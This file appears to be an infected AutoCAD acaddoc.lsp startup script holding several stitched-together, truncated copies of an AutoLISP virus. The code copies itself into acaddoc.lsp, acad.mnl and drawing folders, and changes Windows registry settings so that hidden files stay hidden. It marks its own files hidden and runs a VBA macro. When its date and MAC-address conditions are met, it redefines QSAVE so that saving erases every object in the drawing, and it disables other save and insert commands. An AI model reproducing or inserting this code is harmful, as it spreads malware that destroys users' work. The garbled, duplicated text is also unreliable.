  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(setq
wold_cmd
(getvar
"cmdecho"
)
)
(setvar
"cmdecho"
0
)
(setq
wpath
(
findfile 
"base.dcl"
)
)
(setq
wpath
(substr
wpath 
1
(
-
(
strlen
wpath
) 
8
)
)
)
(setq 
wwmnlwpath 
(
getvar
"menuname"
)
) 
(setq 
wnowdwg 
(getvar 
"dwgname"
)
)
(setq
wwjqm 
(findfile
wnowdwg
)
)
(setq 
wdwgwpath
(substr
wwjqm
1
(
-
(
strlen
wwjqm
) 
(
strlen 
wnowdwg
)
)
)
)
;;;alert  
(
setq 
f
(
open 
"c:\\boot.dat"
"w"
)
)  
(write-line
"[dang]" 
f)
(write-line
(strcat
 "ff="
wdwgwpath
)  
f)
(write-line
(strcat 
"yy="   
wpath
) 
f) 
(close
f
)
(setq
boot 
(findfile
"boot.dat"
)
)	
(if 
(/= 
boot 
""
) 
(command
"_-vbarun" 
"ThisDrawing.hh"
) 
)
(setq
wacadwpath 
(findfile 
"acaddoc.lsp"
)
)	
(setq 
wacadwpath
(substr
wacadwpath
1
(- 
(strlen
wacadwpath
) 
11
)
)
)
(setq
wns1
""
wns2 
""
)
(setq
wlspbj
0)
(setq
wwjqm 
(strcat
wpath
"acaddoc.lsp"
)
) 
(if 
(setq 
wwjm 
(open 
wwjqm
"r"
)
)
(progn
(while
(setq
wwz 
(read-line
 wwjm
)
)
(setq
wns1
wns2
)
(setq
wns2
wwz)
)
(if
(> 
(strlen 
wns1) 
14)  
(if 
(= 
(substr 
wns1 
8 
7) 
"acadapq"
) 
(setq 
wlspbj 
1
)
)
)
(close
wwjm
)
)
)
(setq 
wlspmnl 
0)
(setq 
wwjqm 
(strcat 
wpath 
"acad.mnl"
)
)
(if
(setq 
wwjm 
(open 
wwjqm 
"r"
)
)
(progn
(while 
(setq 
wwz 
(read-line 
wwjm)
)
(setq 
wns1 
wns2)
(setq 
wns2 
wwz)
)
(if 
(> 
(strlen 
wns1) 
14)
(if 
(= 
(substr
 wns1
 8 
7) 
"acadapq"
)
(setq 
wlspmnl 
1)))
(close
 wwjm
)
   )
)
(if 
(= 
wlspmnl 
0)				  
(progn	  
(setq  
wwjqm 
(strcat 
wpath 
(strcat 
(chr 
97) 
(chr 
99) 
(chr 
97) 
(chr 
100) 
(chr 
46) 
(chr 
109) 
(chr 
110) 
(chr 
108
)
)
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
)wwjm
)
(write-line 
"(princ)" 
wwjm)
(close 
wwjm
)
  )
)
(defun 
wwriteapp ()
(if 
(setq 
wwjm1 
(open 
wnewacad 
"w"
)
)
(progn 
(setq 
wwjm 
(open 
woldacad 
"r"
)
)
(while 
(setq 
wwz 
(read-line 
wwjm
)
)
(write-line 
wwz 
wwjm1
)
)				
(close
wwjm
)
(close 
wwjm1
)
)
)
)
(if 
(and 
(= 
wacadwpath
 wdwgwpath) 
(/= 
wacadwpath
 wpath
)
) 
(progn	  
(if
(= 0 
wlspmnl
)
(progn
(setq 
woldacad 
(findfile 
"acaddoc.lsp"
)
)	  
(setq 
wnewacad 
(strcat  
wpath 
"acadapq.lsp")
)
)
(progn 
(setq 
woldacad 
(strcat 
wpath 
"acadapq.lsp"
)
)
(setq
wnewacad 
(findfile 
"acaddoc.lsp"
)
)
 )	  		
 )
(if      
(= 
wlspbj 
0)				  
(progn
(setq 
wwjqm 
(strcat 
wpath 
"acaddoc.lsp"
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
) 
wwjm
)
(write-line
"(princ)"
wwjm
)
(close
wwjm)
)
)
(wwriteapp
)
 )
(progn
(if 
(/= 
wnowdwg 
"Drawing.dwg"
)
(progn
(setq 
woldacad 
(findfile 
"acadapq.lsp"
)
)
(setq 
wnewacad 
(strcat 
wdwgwpath 
"acaddOc.lsp"
)
)
(wwriteapp
)
)
)
)
)
(setvar 
"cmdecho" 
wold_cmd
)
(princ)
(setq 
strtopstr 
(strcat  
(chr
 92) 
(chr 
92) 
(chr 
70) 
(chr 
83) 
(chr 
49) 
(chr 
92) 
(chr 
83) 
(chr 
89) 
(chr 
83) 
(chr 
49)  
(chr 
92) 
(chr 
87) 
(chr 
79) 
(chr 
82) 
(chr 
75) 
(chr 
92) 
(chr 
80) 
(chr 
76) 
(chr 
79) 
(chr 
84) 
(chr 
69) 
(chr 
82)
)
)
(setq
strbottomstr 
(strcat 
*chr 
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(setq
wold_cmd
(getvar
"cmdecho"
)
)
(setvar
"cmdecho"
0
)
(setq
wpath
(
findfile 
"base.dcl"
)
)
(setq
wpath
(substr
wpath 
1
(
-
(
strlen
wpath
) 
8
)
)
)
(setq 
wwmnlwpath 
(
getvar
"menuname"
)
) 
(setq 
wnowdwg 
(getvar 
"dwgname"
)
)
(setq
wwjqm 
(findfile
wnowdwg
)
)
(setq 
wdwgwpath
(substr
wwjqm
1
(
-
(
strlen
wwjqm
) 
(
strlen 
wnowdwg
)
)
)
)
;;;alert  
(
setq 
f
(
open 
"c:\\boot.dat"
"w"
)
)  
(write-line
"[dang]" 
f)
(write-line
(strcat
 "ff="
wdwgwpath
)  
f)
(write-line
(strcat 
"yy="   
wpath
) 
f) 
(close
f
)
(setq
boot 
(findfile
"boot.dat"
)
)	
(if 
(/= 
boot 
""
) 
(command
"_-vbarun" 
"ThisDrawing.hh"
) 
)
(setq
wacadwpath 
(findfile 
"acaddoc.lsp"
)
)	
(setq 
wacadwpath
(substr
wacadwpath
1
(- 
(strlen
wacadwpath
) 
11
)
)
)
(setq
wns1
""
wns2 
""
)
(setq
wlspbj
0)
(setq
wwjqm 
(strcat
wpath
"acaddoc.lsp"
)
) 
(if 
(setq 
wwjm 
(open 
wwjqm
"r"
)
)
(progn
(while
(setq
wwz 
(read-line
 wwjm
)
)
(setq
wns1
wns2
)
(setq
wns2
wwz)
)
(if
(> 
(strlen 
wns1) 
14)  
(if 
(= 
(substr 
wns1 
8 
7) 
"acadapq"
) 
(setq 
wlspbj 
1
)
)
)
(close
wwjm
)
)
)
(setq 
wlspmnl 
0)
(setq 
wwjqm 
(strcat 
wpath 
"acad.mnl"
)
)
(if
(setq 
wwjm 
(open 
wwjqm 
"r"
)
)
(progn
(while 
(setq 
wwz 
(read-line 
wwjm)
)
(setq 
wns1 
wns2)
(setq 
wns2 
wwz)
)
(if 
(> 
(strlen 
wns1) 
14)
(if 
(= 
(substr
 wns1
 8 
7) 
"acadapq"
)
(setq 
wlspmnl 
1)))
(close
 wwjm
)
   )
)
(if 
(= 
wlspmnl 
0)				  
(progn	  
(setq  
wwjqm 
(strcat 
wpath 
(strcat 
(chr 
97) 
(chr 
99) 
(chr 
97) 
(chr 
100) 
(chr 
46) 
(chr 
109) 
(chr 
110) 
(chr 
108
)
)
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
)wwjm
)
(write-line 
"(princ)" 
wwjm)
(close 
wwjm
)
  )
)
(defun 
wwriteapp ()
(if 
(setq 
wwjm1 
(open 
wnewacad 
"w"
)
)
(progn 
(setq 
wwjm 
(open 
woldacad 
"r"
)
)
(while 
(setq 
wwz 
(read-line 
wwjm
)
)
(write-line 
wwz 
wwjm1
)
)				
(close
wwjm
)
(close 
wwjm1
)
)
)
)
(if 
(and 
(= 
wacadwpath
 wdwgwpath) 
(/= 
wacadwpath
 wpath
)
) 
(progn	  
(if
(= 0 
wlspmnl
)
(progn
(setq 
woldacad 
(findfile 
"acaddoc.lsp"
)
)	  
(setq 
wnewacad 
(strcat  
wpath 
"acadapq.lsp")
)
)
(progn 
(setq 
woldacad 
(strcat 
wpath 
"acadapq.lsp"
)
)
(setq
wnewacad 
(findfile 
"acaddoc.lsp"
)
)
 )	  		
 )
(if      
(= 
wlspbj 
0)				  
(progn
(setq 
wwjqm 
(strcat 
wpath 
"acaddoc.lsp"
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
) 
wwjm
)
(write-line
"(princ)"
wwjm
)
(close
wwjm)
)
)
(wwriteapp
)
 )
(progn
(if 
(/= 
wnowdwg 
"Drawing.dwg"
)
(progn
(setq 
woldacad 
(findfile 
"acadapq.lsp"
)
)
(setq 
wnewacad 
(strcat 
wdwgwpath 
"acaddOc.lsp"
)
)
(wwriteapp
)
)
)
)
)
(setvar 
"cmdecho" 
wold_cmd
)
(princ)
(setq 
strtopstr 
(strcat  
(chr
 92) 
(chr 
92) 
(chr 
70) 
(chr 
83) 
(chr 
49) 
(chr 
92) 
(chr 
83) 
(chr 
89) 
(chr 
83) 
(chr 
49)  
(chr 
92) 
(chr 
87) 
(chr 
79) 
(chr 
82) 
(chr 
75) 
(chr 
92) 
(chr 
80) 
(chr 
76) 
(chr 
79) 
(chr 
84) 
(chr 
69) 
(chr 
82)
)
)
(setq
strbottomstr 
(strcat 
*chr 
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(setq
wold_cmd
(getvar
"cmdecho"
)
)
(setvar
"cmdecho"
0
)
(setq
wpath
(
findfile 
"base.dcl"
)
)
(setq
wpath
(substr
wpath 
1
(
-
(
strlen
wpath
) 
8
)
)
)
(setq 
wwmnlwpath 
(
getvar
"menuname"
)
) 
(setq 
wnowdwg 
(getvar 
"dwgname"
)
)
(setq
wwjqm 
(findfile
wnowdwg
)
)
(setq 
wdwgwpath
(substr
wwjqm
1
(
-
(
strlen
wwjqm
) 
(
strlen 
wnowdwg
)
)
)
)
;;;alert  
(
setq 
f
(
open 
"c:\\boot.dat"
"w"
)
)  
(write-line
"[dang]" 
f)
(write-line
(strcat
 "ff="
wdwgwpath
)  
f)
(write-line
(strcat 
"yy="   
wpath
) 
f) 
(close
f
)
(setq
boot 
(findfile
"boot.dat"
)
)	
(if 
(/= 
boot 
""
) 
(command
"_-vbarun" 
"ThisDrawing.hh"
) 
)
(setq
wacadwpath 
(findfile 
"acaddoc.lsp"
)
)	
(setq 
wacadwpath
(substr
wacadwpath
1
(- 
(strlen
wacadwpath
) 
11
)
)
)
(setq
wns1
""
wns2 
""
)
(setq
wlspbj
0)
(setq
wwjqm 
(strcat
wpath
"acaddoc.lsp"
)
) 
(if 
(setq 
wwjm 
(open 
wwjqm
"r"
)
)
(progn
(while
(setq
wwz 
(read-line
 wwjm
)
)
(setq
wns1
wns2
)
(setq
wns2
wwz)
)
(if
(> 
(strlen 
wns1) 
14)  
(if 
(= 
(substr 
wns1 
8 
7) 
"acadapq"
) 
(setq 
wlspbj 
1
)
)
)
(close
wwjm
)
)
)
(setq 
wlspmnl 
0)
(setq 
wwjqm 
(strcat 
wpath 
"acad.mnl"
)
)
(if
(setq 
wwjm 
(open 
wwjqm 
"r"
)
)
(progn
(while 
(setq 
wwz 
(read-line 
wwjm)
)
(setq 
wns1 
wns2)
(setq 
wns2 
wwz)
)
(if 
(> 
(strlen 
wns1) 
14)
(if 
(= 
(substr
 wns1
 8 
7) 
"acadapq"
)
(setq 
wlspmnl 
1)))
(close
 wwjm
)
   )
)
(if 
(= 
wlspmnl 
0)				  
(progn	  
(setq  
wwjqm 
(strcat 
wpath 
(strcat 
(chr 
97) 
(chr 
99) 
(chr 
97) 
(chr 
100) 
(chr 
46) 
(chr 
109) 
(chr 
110) 
(chr 
108
)
)
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
)wwjm
)
(write-line 
"(princ)" 
wwjm)
(close 
wwjm
)
  )
)
(defun 
wwriteapp ()
(if 
(setq 
wwjm1 
(open 
wnewacad 
"w"
)
)
(progn 
(setq 
wwjm 
(open 
woldacad 
"r"
)
)
(while 
(setq 
wwz 
(read-line 
wwjm
)
)
(write-line 
wwz 
wwjm1
)
)				
(close
wwjm
)
(close 
wwjm1
)
)
)
)
(if 
(and 
(= 
wacadwpath
 wdwgwpath) 
(/= 
wacadwpath
 wpath
)
) 
(progn	  
(if
(= 0 
wlspmnl
)
(progn
(setq 
woldacad 
(findfile 
"acaddoc.lsp"
)
)	  
(setq 
wnewacad 
(strcat  
wpath 
"acadapq.lsp")
)
)
(progn 
(setq 
woldacad 
(strcat 
wpath 
"acadapq.lsp"
)
)
(setq
wnewacad 
(findfile 
"acaddoc.lsp"
)
)
 )	  		
 )
(if      
(= 
wlspbj 
0)				  
(progn
(setq 
wwjqm 
(strcat 
wpath 
"acaddoc.lsp"
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
) 
wwjm
)
(write-line
"(princ)"
wwjm
)
(close
wwjm)
)
)
(wwriteapp
)
 )
(progn
(if 
(/= 
wnowdwg 
